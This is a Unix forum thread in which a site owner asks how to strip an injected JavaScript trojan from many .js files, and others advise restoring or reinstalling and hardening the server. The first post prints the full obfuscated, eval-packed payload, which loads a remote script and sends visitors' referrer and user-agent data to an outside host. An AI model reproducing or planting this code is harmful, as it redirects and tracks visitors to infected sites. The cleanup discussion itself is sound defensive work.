Login or Register to Ask a Question and Join Our Community


Shell Programming and Scripting

how to remove hacking code from multiple files

Login to Discuss or Reply to this Discussion in Our Community

 
Thread Tools Search this Thread
Top Forums Shell Programming and Scripting how to remove hacking code from multiple files
# 1  
Old 10-02-2012
how to remove hacking code from multiple files
Hello,

I've located with clamav multiple .js files infected at the end with the above (JS.Trojan.Redir-3) code

Code:
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29
\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27
\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B
\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63
\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63
\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72
\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D
\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69
\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79
\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C
\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,
_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--)
{_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return 
_0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3])
{_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} 
(_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

I would like to remove all of these with a shell command.

I would use as an example this one :
Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

any help would be appriciated.
# 2  
Old 10-03-2012
Suggestion: if this is java for an application remove the app completely and then re-install. Assuming these are required for some application that users need, you could break the application by trying to uninject code.

If new files just magically appeared then delete the whole files.

However the code got injected, there are some problems on the system with permissions, or someone is surfing the net with privilege, or working on questionable sites. You need to block the behavior or change file permissions that put the code there.

And consider hardening your system.
# 3  
Old 10-03-2012
Yeah, restore from backup or re-install. Would you ever really trust those files again? I wouldn't.
# 4  
Old 10-04-2012
I'm not asking of opinions if I should harden the server or delete the files.
My question is specific about removing specific text into multiple files with shell/script.
maybe the text wouldn't be hack code , maybe it would be a poem, still I want to do the same thing, removing specific text into multiple files with shell/script.
# 5  
Old 10-04-2012
Quote:
Originally Posted by MaRiOsGR
I'm not asking of opinions
Please accept my sincere apologies for the impetousity of my young and unexperienced colleagues who tried to help you. Of course they were wrong.

Quote:
I would like to remove all of these with a shell command.
To strictly answer your question: use any text-editing tool you like, including (but not limited to): awk, sed, perl, ed, ex, vi, ... All of these tools can be invocated as shell commands.

Quote:
I would use as an example this one :

Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i [...]

but I'm not sure what to change with all the escape characters and the * symbols.
If you are not sure i suggest you use another tool with which you are. Replace "perl" with "awk", "sed" or any other of the aforementioned text filters until you find one with which you are indeed sure, then use that one. To suggest one would largely be a matter of opinion and you specifically did not ask for that, so i will keep my completely arbitrary personal pejoratives to myself.

I hope this helps.

bakunin
# 6  
Old 10-04-2012
Quote:
Originally Posted by bakunin
To suggest one would largely be a matter of opinion and you specifically did not ask for that, so i will keep my completely arbitrary personal pejoratives to myself.
It's "good" to see you have spare time for irony,
it has nothing to do with helping, but ofcourse everyone can post everything he likes.

While posting here in the forum I see
Quote:
Shell Programming and Scripting Post questions about KSH, CSH, SH, BASH, PERL, PHP, SED, AWK and OTHER shell scripts and shell scripting languages here.
I'm sure they did put it for a reason there,so the replies I got was about the security of the server and not about the correct usage of perl
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

I know you got insulted for a reason I cannot explain with my previous post, but my question was specific and I was trying to narrow down the possible answers.

Someone could also reply that I should not use javascript
or that I shouldn't use linux servers,
but that would no help at all, wouldn't it?

Quote:
Originally Posted by bakunin
If you are not sure i suggest you use another tool with which you are..
If I was sure for another tool or the exact command,
I wouldn't post this,asking for people who know how to use it correctly,
wouldn't I ?
# 7  
Old 10-04-2012
If there was an easy magic do-everything fix for you, we'd give it to you so you could get it fixed and stop insulting us.

It's not "opinion". I've dealt with this before. These kind of malware infections are designed to be difficult to detect and remove. When I ran into a situation like this where the customer had no backups, I wrestled with it for days, but removing the bad parts kept breaking the pages, and it made efforts to put itself back that made everything worse than when I started. I eventually had to track down the original .zip files for the software -- thank goodness the internet is huge, some data-packrat somewhere or other is likely to have anything -- replace everything with a .php extension, and remove everything else newer than 90 days old.

Then afterwards, I secured the permissions properly so it wouldn't happen again...
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. UNIX for Beginners Questions & Answers

How to implement a simple command/code for multiple files?

I have been extracting a row, based on multiple key word from a xls/csv file, by using the following command. I have to implement the same for multiple xls/csv files, therefore please help me to do the same. awk ' { tbp=0 if ($0 ~ keyword1 && k1 == 0) { tbp=1; k1++ } if ($0 ~ keyword2... (2 Replies)
Discussion started by: dineshkumarsrk
2 Replies

2. Shell Programming and Scripting

[Solved] How to remove multiple files?

Hi Gurus, I have below files in one directory. the file name has date and time portion which is exactly the file be created. I need keep only lasted created file which is abc_20140101_1550 and remove rest of the file. abc_20140101_1300 abc_20140101_1200 abc_20140101_1400 abc_20140101_1500... (2 Replies)
Discussion started by: ken6503
2 Replies

3. Shell Programming and Scripting

How to remove hidden backslash in multiple files?

Hi I have around 300 files in a folder. When I type ls -l I see the following Mouse.chr10_+_:101862321-101863928.maf Mouse.chr10_+_:101862322-101863928.maf Mouse.chr10_+_:101862323-101863928.maf But when I run my scripts, they couldn't recognise the filename because of hidden backslash like... (5 Replies)
Discussion started by: quincyjones
5 Replies

4. Shell Programming and Scripting

Code to remove files when corresponding file doesnt exist isnt working.

I am trying to add some code to the begging of a script so that it will remove all the .transcript files, when their is no coressponding .wav file. But it doesnt work. This is the code I have added: for transcriptfile in `$voicemaildir/*.transcript`; do wavfile=`echo $transcriptfile | cut -d'.'... (2 Replies)
Discussion started by: ghurty
2 Replies

5. Shell Programming and Scripting

Remove java code from multiple files

Hello, We have a client who has had an FTP injection attack on their account. Over 600 files have this code added to the files: <script>var t="";var... (10 Replies)
Discussion started by: dhasbro
10 Replies

6. UNIX for Dummies Questions & Answers

How to remove characters from multiple .txt files

Friends, I want to remove charecters from multiple .txt files. Foe example : In this .txt files there are many "ctrl m" present in last of each line in one .txt file. I want to remove "ctrl m" from each line from all .txt files. Need your help regarding this. (4 Replies)
Discussion started by: meetsubhas
4 Replies

7. Shell Programming and Scripting

To remove multiple files in FTP

We have a files in FTP server..... after getting the files from FTP by mget *.* i hav to remove all files (multiple files) at once... is there any command to delete multiple files at once (2 Replies)
Discussion started by: nani1984
2 Replies

8. UNIX for Dummies Questions & Answers

Using AWK: Extract data from multiple files and output to multiple new files

Hi, I'd like to process multiple files. For example: file1.txt file2.txt file3.txt Each file contains several lines of data. I want to extract a piece of data and output it to a new file. file1.txt ----> newfile1.txt file2.txt ----> newfile2.txt file3.txt ----> newfile3.txt Here is... (3 Replies)
Discussion started by: Liverpaul09
3 Replies

9. Shell Programming and Scripting

How to remove certain lines in multiple txt files?

Hi , I have this type of files:- BGH.28OCT2008.00000001.433155.001 BGH.28OCT2008.00000002.1552361.001 BGH.28OCT2008.00000003.1438355.001 BGH.28OCT2008.00000004.1562602.001 Inside them contains the below: 5Discounts 6P150 - Max Total Usage RM150|-221.00 P150 EPP - Talktime RM150... (5 Replies)
Discussion started by: olloong
5 Replies

10. Shell Programming and Scripting

read list of filenames from text file and remove these files in multiple directories

I have a large list of filenames from an Excel sheet, which I then translate into a simple text file. I'd like to use this list, which contains various file extensions , to archive these files and then remove them recursively through multiple directories and subdirectories. So far, it looks like... (5 Replies)
Discussion started by: fxvisions
5 Replies
Login or Register to Ask a Question